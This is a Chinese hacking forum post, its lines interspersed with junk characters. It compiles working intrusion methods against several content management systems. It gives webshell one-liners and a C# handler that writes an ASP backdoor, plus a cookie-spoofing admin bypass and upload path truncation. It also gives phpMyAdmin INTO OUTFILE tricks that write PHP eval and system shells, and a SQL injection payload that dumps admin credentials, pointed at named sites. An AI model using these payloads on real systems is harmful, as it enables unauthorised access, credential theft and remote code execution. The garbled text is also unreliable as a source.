- t Q$ m# K+ n8 Q* w6 C<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">' l3 m: F# d ^4 {
Upload a new file:<br>3 T/ i* S1 Y! T6 J( O# {+ j; n) o
<input type="file" name="NewFile" size="50"><br>
/ J' v1 F5 R a+ g) y/ Q: t<input id="btnUpload" type="submit" value="Upload">
3 |3 M5 Q O/ q; W</form>
7 Z0 e1 g4 e3 k9 I+ F-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" j7 |3 S6 Y h' q: n( ]/ _2 Y2 v: s, K7 k
SDcms 后台拿webshell3 ~6 J, U3 Y; a
% F/ y0 [7 F3 Q3 f/ a/ p
第一种方法:: g7 H# Q* P7 w$ ]8 _1 e
进入后台-->系统管理-->系统设置-->系统设置->网站名称;1 ^- O, G. m5 d
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx3 }% o! w; u8 M3 v7 d5 }
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
3 ~# N9 w3 P- ^/ H& k( L第二种方法:
- M5 k5 \) V" u2 ?- f进入后台-->系统管理-->系统设置-->系统设置->上传设置;) z1 K% w4 @1 m! k" E9 `
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!$ d: o: o# e( m w
第三种方法: ?$ ]2 K7 d+ K. ~
进入后台-->界面管理-->模板文件管理-->创建文件
7 f0 o" i, k- ]文件名写入getshell.ashx6 R8 p. I) r2 Z! ^
内容写入下面内容:
" H+ y& p( T- T+ P9 A5 V- t/====================复制下面的=========================/
, R7 S! D5 Y0 |; e$ v<%@ WebHandler Language="C#" Class="Handler" %>/ o" ?4 K- i" `
using System;
( |/ `( M, E) P* Z* o! |- ousing System.Web;6 ?! E# T6 S7 @( T& J/ X \7 Z
using System.IO;
( z6 e1 D' i6 u9 s$ I1 S. w7 ] {+ hpublic class Handler : IHttpHandler {
2 ^2 F, b8 D1 Opublic void ProcessRequest (HttpContext context) {
+ ^3 f- O' B9 {8 b, m$ W. H% m) Dcontext.Response.ContentType = "text/plain";
0 k/ r+ v5 N- A, CStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
F% l3 N/ _' X6 H: J. nfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");5 k9 U3 ]( v6 i+ o
file1.Flush();' l, H8 W7 ]: E* Z# F
file1.Close();. ]+ @5 e Z$ r, v. B# v- m) P; ]( h, S* \
}3 P7 F; \( c/ ]( k4 H$ V# R
public bool IsReusable {1 n/ i d; Y p2 v9 e; T' Q1 q5 [
get {: m0 |7 f7 |0 J
return false;# {: W" t% Z B2 f. |9 K. _% p
}
1 ]( W& ^' a* X9 ^& K}
! k# o4 D1 u6 k' V6 S! i1 G) A0 {}: z8 [5 I' Y! C% R2 _1 S+ x# c
/=============================================/
7 z: T" p0 S) f) _ H访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx+ a) N; {; v- c: w3 N1 u
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接$ J% \! P$ i2 M. \! h
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 Z9 R- Y. g D
4 M6 t! X# c' h- ]
ESCMS网站管理系统0day
) C% o5 a0 d" m' c6 |0 z# [3 _: e* P' t, w) @
后台登陆验证是通过admin/check.asp实现的6 m- O1 d. d7 V0 B6 d3 W
9 y2 S' i J! V* W4 ?首先我们打开http://target.com/admin/es_index.html4 i4 ]/ o1 F% a* a
然后在COOKIE结尾加上
; h+ v* w" B+ L' X) {; ESCMS$_SP2=ES_admin=st0p;+ r7 M+ A/ L, K# d7 _- U# C
修改,然后刷新
4 c: {" z* c' Y, o# \1 K进后台了嘎..
) A$ h( i* ^) J1 Y. J+ C4 p然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
5 {9 y0 T9 w! U2 e/ D/ s& Q+ U$ ^
- W a+ Y* l# Z' s6 W! p利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.3 o! o% k5 t9 q. s+ Z7 j& @
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
; v, q, Z9 ?0 t" t7 A存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
- q7 t, D0 c# }2 T8 {在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
' q, _+ ?+ n9 |& D$ ?/ \------------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ ]1 \3 H' R$ W) i' v6 U8 A2 _3 k: z
8 L6 ?8 Q5 G" c$ J( i宁志网站管理系统后台无验证漏洞及修复
* j3 ~- a' R0 V5 {% u1 E) V. \
* }4 Z2 s' N: T. b4 ^1 H网上搜了一下,好像没有发布.如有雷同纯粹巧合!: Y' e1 m( Z* N: g% s3 ?9 I
官方网站:www.ningzhi.net* C. F" z6 A( b
学校网站管理系统 V.2011版本 ) r" K( ?& w, V; |# T# o
http://down.chinaz.com/soft/29943.htm - R) I% ? v0 u
其它版本(如:政府版等),自行下载.( C; S; V. R) D2 g
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~' }( |; n$ C: w/ x0 m$ U; Q# `+ q
login.asp代码如下:
( I3 [" J" f5 |1 N$ z/ p! F/ D<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 5 q$ [+ U- g$ y8 h; z1 Y
manage.asp代码我就不帖出来了.反正也没验证.
2 z+ F+ v, {0 D8 x" [只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!2 U0 s% ^7 \; Q
漏洞利用:9 \. g$ [& O* Q/ U$ |2 y
直接访问http://www.0855.tv/admin/manage.asp% E, _8 A$ l, Q: L
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5' X+ v1 |3 i9 p/ m- P. @/ k
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" `* {6 _, K" } u" F/ Y+ W6 j- Y' w4 C
phpmyadmin拿shell的四种方法总结及修复
1 a# m/ \' j' p4 c; h$ C3 I# ]+ E' Q! \* `, n9 \$ D; N) c
方法一:
0 O' u& r x) @2 P0 Z1 HCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
9 N6 H. @* H5 XINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
8 a" A) {+ j) Q& L) ?: XSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
# k( D2 r' y( N! `* L# V2 i----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
7 e. O) G' R: O4 i z. n: k" {& } 一句话连接密码:7on
! U5 {. j# |1 u6 i; I$ ^' ?方法二:
: d! P6 H: A6 i) C读取文件内容: select load_file('E:/xamp/www/s.php');6 Z" h. J. _6 g$ \7 `; M6 S% l( @' _
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
2 Q c' x* O* P$ v+ Acmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'6 K! h0 e5 o. s% c0 N- [
方法三:
/ H; z' E1 `) T0 `5 O$ Q0 C7 KJhackJ版本 PHPmyadmin拿shell
6 u& g0 v. p- X( WCreate TABLE study (cmd text NOT NULL);7 M) I. ]5 f' X0 e
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');6 u! x* z. g: [7 h+ V
select cmd from study into outfile 'E:/wamp/www/7.php';
) _/ Q( c, c! x0 V( h& eDrop TABLE IF EXISTS study;, b6 u* P+ p) Q5 h; A$ V
<?php eval($_POST[cmd])?>
3 Y: U" d6 ?# k9 [" f' ~CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
2 l6 P( I6 g# }6 m& R# tINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 19 E7 {9 S6 F& K( G# M
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
: C, V* d% b0 X/ J" i( [DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
U5 o: i/ f% R$ \方法四:1 c8 |7 x2 N; X6 h# U8 V: R' m! [
select load_file('E:/xamp/www/study.php');4 ]& ?, ?% d+ m, I G( b! u
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
, Q( |3 G7 [; y0 q1 t然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
8 E2 ~: C8 e4 m4 c( n' {! y-----------------------------------------------------------------------------------------------------------------------------------------------------------------------& q7 G, B0 k5 d; K9 }
3 k4 B' n- s2 l* t; kNO.001中学网站管理系统 Build 110628 注入漏洞3 |/ g" u1 i! x3 x* N2 J/ [/ m% K
- j$ _: j* d' W; zNO.001中学网站管理系统功能模块:, J5 `( O9 @1 R4 b; s
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等% r; n, z. h7 M% Y
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息$ f* h) ^" E6 e" y' ?7 e. E& }
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
: C9 N; _# e$ Q9 W3 N5 _4.视频图片管理:一级分类,动态添加视频或者图片等信息0 F [: z" h: g+ A1 @
5.留言管理:对留言,修改,删除、回复等管理
6 t! `% K9 W! H& F0 ]6.校友频道:包括校友资料excel导出、管理等功能
! O4 D" @2 V( W0 Q0 n7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页! N2 ^7 I8 h: R2 M! R
默认后台:admin/login.asp
' s; Q: C1 }6 H官方演示:http://demo.001cms.net. t0 b3 r: ^( y4 H
源码下载地址:http://down.chinaz.com/soft/30187.htm
3 J5 Z4 }; c, v M& K; q: OEXP:
/ F* ^3 }5 y0 C' n# a, D5 n: iunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
/ x% e+ C/ i/ s6 z1 g3 ~测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin' ?0 z" A/ O1 a ~, d/ _. O
getshell:后台有备份,你懂的
" k( D) m1 [4 e另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。) k$ S) V: B! p6 N
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对